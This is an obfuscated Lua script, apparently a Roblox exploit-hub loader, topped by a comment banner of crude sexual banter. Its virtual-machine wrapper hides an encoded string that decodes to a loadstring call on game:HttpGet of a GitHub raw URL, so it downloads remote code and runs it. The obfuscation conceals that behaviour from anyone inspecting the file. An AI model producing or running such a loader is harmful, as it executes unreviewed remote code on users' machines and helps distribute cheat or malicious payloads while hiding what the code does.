--[[

         \/          \/         \/    \/                \/     \/     \/                   
          ðŸ”’\_ðŸ›¡ï¸Volt.llc.obfuscatorðŸ›¡ï¸ [PROTECT] V17.12.19ðŸ”’
           
           | You should try cum inside or alone! | >>> XD 
           | Message by ??? | >>> XD
           
           [   (;  *cums in* and *you* a.. ah... uhh.. more.. ahhh.. ]
           [ ðŸ˜X: want more? [>>><<<] ðŸ˜‹you: y.. ye.. yes i ]
           [ ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ðŸ”’ ]
           [ ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ðŸ˜ðŸ˜ðŸ›¡ï¸ ]
           [ Hey.. i love you !ðŸ¤¤ and we do something ðŸ¤« ok? ðŸ˜ðŸ‘‰ðŸ‘Œ ]






]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v84-(v84%((838 + 94) -(857 + 74))) ;else local v85=(570 -((523 -156) + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + (877 -(282 + 595))) ;end end local function v21()local v34=0 -(0 -0) ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(0 + (0 -0))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=958 -((1637 -745) + 65) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * (188 + 68)) + v36 ;end local function v23()local v38=(0 -0) -0 ;local v39;local v40;local v41;local v42;while true do if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end if (v38==(2 -1)) then return (v42 * (30433252 -13656036)) + (v41 * (27790 + 19913 + 17833)) + (v40 * (1253 -(915 + 82))) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1487 -(998 + 488) ;local v46=(v20(v44,1 + 0 ,17 + 3 ) * (((1915 -(1789 + 124)) -0)^(1170 -(116 + 1022)))) + v43 ;local v47=v20(v44,1208 -((1835 -(745 + 21)) + 118) ,70 -39 );local v48=((v20(v44,69 -37 )==1) and  -(1 + 0)) or (1 -0) ;if (v47==(0 + 0)) then if (v46==0) then return v48 * (791 -(368 + 423)) ;else local v90=0 -0 ;while true do if (v90==(0 + 0)) then v47=19 -(10 + 8) ;v45=0 -0 ;break;end end end elseif (v47==(2489 -(416 + 26))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-((6228 -4419) -786) ) * (v45 + (v46/((440 -(145 + 293))^((2229 -(760 + 987)) -(44 + (1061 -675)))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==3) then v59=nil;v60=nil;v52=4;end if (v52~=0) then else v53=0 + 0 ;v54=nil;v52=1;end if (v52~=2) then else v57=nil;v58=nil;v52=4 -1 ;end if (v52==1) then v55=nil;v56=nil;v52=2 -0 ;end if (4~=v52) then else while true do if ((1386 -(746 + 638))==v53) then local v95=0;local v96;while true do if (v95==0) then v96=0 + 0 ;while true do if (v96~=(1 -0)) then else v53=3;break;end if (v96~=(341 -(218 + 123))) then else local v133=0;while true do if (v133~=1) then else v96=1;break;end if (v133==(1581 -(1535 + 46))) then v58=nil;v59=nil;v133=1;end end end end break;end end end if ((0 + 0)~=v53) then else v54=0;v55=nil;v53=1 + 0 ;end if (v53==(561 -(306 + 254))) then v56=nil;v57=nil;v53=1 + 1 ;end if (v53~=3) then else v60=nil;while true do local v97=0 -0 ;local v98;while true do if (v97~=(1467 -(899 + 568))) then else v98=0;while true do if (v98~=1) then else if (v54==2) then local v139=0 + 0 ;local v140;local v141;while true do if (v139==1) then while true do if (v140~=(0 -0)) then else v141=603 -(268 + 335) ;while true do if (v141==0) then for v153=1,v59 do local v154=290 -(60 + 230) ;local v155;local v156;local v157;while true do if (v154==(573 -(426 + 146))) then v157=nil;while true do if (v155==1) then if (v156==(1 + 0)) then v157=v21()~=(1456 -(282 + 1174)) ;elseif (v156==2) then v157=v24();elseif (v156==(814 -(569 + 242))) then v157=v25();end v60[v153]=v157;break;end if (v155==0) then local v165=0;while true do if (v165~=(2 -1)) then else v155=1 + 0 ;break;end if (v165==0) then v156=v21();v157=nil;v165=1025 -(706 + 318) ;end end end end break;end if (v154==(1251 -(721 + 530))) then local v163=1271 -(945 + 326) ;while true do if (1~=v163) then else v154=1;break;end if (v163~=(0 -0)) then else v155=0 + 0 ;v156=nil;v163=1;end end end end end v58[3]=v21();v141=701 -(271 + 429) ;end if (v141==1) then for v158=1,v23() do local v159=0 + 0 ;local v160;local v161;while true do if (v159==(1500 -(1408 + 92))) then v160=1086 -(461 + 625) ;v161=nil;v159=1;end if (v159~=1) then else while true do if (v160~=(1288 -(993 + 295))) then else v161=v21();if (v20(v161,1 + 0 ,1)~=0) then else local v168=1171 -(418 + 753) ;local v169;local v170;local v171;local v172;while true do if (v168==1) then local v173=0 + 0 ;while true do if (1==v173) then v168=1 + 1 ;break;end if (v173~=0) then else v171=nil;v172=nil;v173=1;end end end if (v168==(0 + 0)) then local v174=0;while true do if ((1 + 0)==v174) then v168=1;break;end if (v174~=(529 -(406 + 123))) then else v169=1769 -(1749 + 20) ;v170=nil;v174=1 + 0 ;end end end if (v168==(1324 -(1249 + 73))) then while true do if (v169~=3) then else if (v20(v171,2 + 1 ,1148 -(466 + 679) )~=1) then else v172[4]=v60[v172[4]];end v55[v158]=v172;break;end if (v169==2) then local v176=0 -0 ;while true do if (0==v176) then if (v20(v171,2 -1 ,1)==(1901 -(106 + 1794))) then v172[1 + 1 ]=v60[v172[1 + 1 ]];end if (v20(v171,2,2)==(2 -1)) then v172[3]=v60[v172[3]];end v176=1;end if ((2 -1)==v176) then v169=117 -(4 + 110) ;break;end end end if (v169==(584 -(57 + 527))) then local v177=0;while true do if (v177==0) then v170=v20(v161,2,3);v171=v20(v161,4,1433 -(41 + 1386) );v177=104 -(17 + 86) ;end if (v177==1) then v169=1 + 0 ;break;end end end if (v169==(1 -0)) then v172={v22(),v22(),nil,nil};if (v170==(0 -0)) then local v180=0;local v181;while true do if (v180~=0) then else v181=0 -0 ;while true do if (v181==(0 + 0)) then v172[1 + 2 ]=v22();v172[7 -3 ]=v22();break;end end break;end end elseif (v170==1) then v172[3]=v23();elseif (v170==(67 -(30 + 35))) then v172[3 + 0 ]=v23() -((1259 -(1043 + 214))^(60 -44)) ;elseif (v170==3) then local v190=1212 -(323 + 889) ;local v191;local v192;while true do if (v190~=0) then else v191=0;v192=nil;v190=1;end if (1==v190) then while true do if (v191==(0 -0)) then v192=580 -(361 + 219) ;while true do if (v192==(320 -(53 + 267))) then v172[1 + 2 ]=v23() -(2^(429 -(15 + 398))) ;v172[4]=v22();break;end end break;end end break;end end end v169=984 -(18 + 964) ;end end break;end end end break;end end break;end end end v54=3;break;end end break;end end break;end if (v139==(0 -0)) then v140=0;v141=nil;v139=1 + 0 ;end end end if (v54==1) then local v142=0 + 0 ;local v143;while true do if (v142==(850 -(20 + 830))) then v143=0 + 0 ;while true do if (1==v143) then v60={};v54=128 -(116 + 10) ;break;end if (v143==(0 + 0)) then local v146=738 -(542 + 196) ;while true do if (v146==(0 -0)) then local v152=0 + 0 ;while true do if (v152==(1 + 0)) then v146=1;break;end if (v152==(0 + 0)) then v58={v55,v56,nil,v57};v59=v23();v152=1552 -(1126 + 425) ;end end end if (v146~=(406 -(118 + 287))) then else v143=3 -2 ;break;end end end end break;end end end break;end if (v98==(1121 -(118 + 1003))) then local v134=0;local v135;while true do if (v134==(0 -0)) then v135=0;while true do if (v135~=0) then else if (v54==(377 -(142 + 235))) then local v147=0 -0 ;local v148;while true do if (v147~=(0 + 0)) then else v148=977 -(553 + 424) ;while true do if (v148~=(0 -0)) then else v55={};v56={};v148=1 + 0 ;end if (v148~=(1 + 0)) then else v57={};v54=1;break;end end break;end end end if (v54==3) then local v149=0 + 0 ;local v150;while true do if (v149~=0) then else v150=0;while true do if (0==v150) then local v162=0;while true do if ((0 + 0)~=v162) then else for v166=1,v23() do v56[v166-(1 + 0) ]=v28();end return v58;end end end end break;end end end v135=1;end if (v135~=(2 -1)) then else v98=1;break;end end break;end end end end break;end end end break;end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=6) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82>1) then local v101=v81[2];local v102=v79[v81[3]];v79[v101 + 1 ]=v102;v79[v101]=v102[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82<=4) then if (v82>3) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]();end elseif (v82>5) then local v110=v81[2];local v111=v79[v81[3]];v79[v110 + 1 ]=v111;v79[v110]=v111[v81[4]];else local v115=v81[2];v79[v115]=v79[v115](v13(v79,v115 + 1 ,v74));end elseif (v82<=9) then if (v82<=7) then v79[v81[2]]=v63[v81[3]];elseif (v82==8) then local v117=v81[2];v79[v117]=v79[v117](v13(v79,v117 + 1 ,v74));else local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==1) then v74=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==2) then for v137=v120,v74 do local v138=0;while true do if (v138==0) then v123=v123 + 1 ;v79[v137]=v121[v123];break;end end end break;end if (v119==0) then v120=v81[2];v121,v122=v72(v79[v120](v13(v79,v120 + 1 ,v81[3])));v119=1;end end end elseif (v82<=11) then if (v82>10) then v79[v81[2]]();else local v124=v81[2];local v125,v126=v72(v79[v124](v13(v79,v124 + 1 ,v81[3])));v74=(v126 + v124) -1 ;local v127=0;for v130=v124,v74 do v127=v127 + 1 ;v79[v130]=v125[v127];end end elseif (v82==12) then v79[v81[2]]=v81[3];else do return;end end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403863O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O4C437465616D732F5A4B4875622F6D61696E2F254430253931254430252O422544302542302D254430254231254430252O422544302542302D254430254244254430254245254430254231253243253230254430252O42254430254245254430252O4200083O0012043O00013O001204000100023O002002000100010003001201000300044O0009000100034O00055O00022O00033O000100012O000D3O00017O00",v9(),...);end
